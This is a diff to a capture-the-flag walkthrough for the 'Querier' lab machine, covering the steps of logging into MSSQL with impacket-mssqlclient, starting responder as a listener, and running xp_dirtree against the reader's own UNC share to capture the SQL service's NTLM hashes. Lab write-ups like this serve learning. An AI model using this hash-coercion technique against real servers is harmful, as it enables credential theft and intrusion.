Miner221272/Writeups/Medium/Querier/writeup.md

 the first thing we will be doing is getting 2 terminal windows open.
 Please pay attention because we will be jumping between the 2 throughout this section.
 We will track which we are in with one terminal being labeled "Term 1" and the other being "Term 2".

-Term 1: Log into the system with the following command impacket-mssqlclient reporting:@10.129.156.234 -windows-auth
+Term 1: Log into the system with the following command: impacket-mssqlclient reporting:@10.129.156.234 -windows-auth

-Next Switch to Term 2:
+Term 2:
 Use the following command to setup our listener:

 responder -I [YOUR INTERFACE CONNECTED TO THE NETWORK WITH THE VULNERABLE BOX]

 Information can be found using "ip addr show"

+Term 1:
+Next we will send the hashes from the SQL Service with the following command: xp_dirtree '\\[YOUR LOCAL IP]\share\file'

 </details>